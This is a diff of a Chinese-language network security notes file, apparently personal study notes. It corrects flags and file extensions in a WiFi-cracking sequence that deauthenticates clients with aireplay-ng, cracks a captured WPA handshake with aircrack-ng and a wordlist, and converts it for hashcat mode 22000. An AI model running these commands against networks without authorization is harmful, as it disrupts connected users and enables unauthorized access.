--- a/网络安全.md
+++ b/网络安全.md
@@ -113,9 +113,9 @@ aireplay-ng -a *:*:*:*:*:* -c *:* -0 90 wlan0mon
 aircrack-ng -b *:*:*:*:*:* -w password.txt *.cap
    # aircracky参数: -b “bssid地址” -w “密码字典文件”  “抓包成功的cap文件”
 # 把cap转换成hccap
-aircrack-ng handshake-01.cap -J handshake-01
+aircrack-ng handshake-01.cap -j handshake-01
 # 用hashcat破解密码  参数: -m 22000 模式 = WPA-PBKDF2-PMKID+EAPOL
-hashcat -m 22000 handshake-01.hccap password.txt
+hashcat -m 22000 handshake-01.hccapx password.txt
 
 # 停止无线网卡监听模式
 airmon-ng stop wlan0mon
